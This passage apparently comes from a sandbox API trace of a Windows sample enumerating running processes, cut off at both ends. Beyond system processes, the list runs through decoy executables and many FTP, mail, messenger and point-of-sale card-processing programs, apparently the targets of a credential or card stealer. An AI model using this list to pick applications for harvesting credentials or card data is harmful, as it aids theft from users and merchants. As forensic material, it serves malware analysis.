lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0157.614] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.618] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.620] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0157.622] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0157.624] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.626] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.628] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0157.631] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0157.635] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.637] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0157.639] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0157.642] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0157.644] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0157.646] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0157.648] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0157.650] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0157.653] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0157.677] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0157.680] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0157.684] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0157.686] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0157.688] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0157.690] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0157.693] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0157.695] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0157.697] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0157.699] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0157.702] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0157.704] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0157.707] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0157.710] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0157.712] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0157.719] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0157.721] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0157.724] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0157.727] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0157.730] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0157.732] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0157.735] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0157.737] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0157.739] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0157.741] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0157.743] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0157.745] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0157.747] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0157.749] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0157.751] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0157.752] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0157.757] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0157.760] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0157.761] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0157.763] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0157.765] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0157.767] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0157.777] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0157.779] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0157.781] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0157.783] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0157.785] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0157.787] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0157.801] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0157.803] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0157.805] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0157.806] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0157.808] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0157.812] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0157.814] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0157.817] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0157.819] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0157.822] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0157.823] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.826] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0157.828] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0157.830] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0157.832] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0157.833] Process32Next (in: hSnapshot=0x1ecc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0157.835] CloseHandle (hObject=0x1ecc) returned 1 [0157.835] Sleep (dwMilliseconds=0x64) [0157.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bf0 [0158.004] Process32First (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.005] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0158.007] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0158.009] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.011] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0158.012] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.014] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, 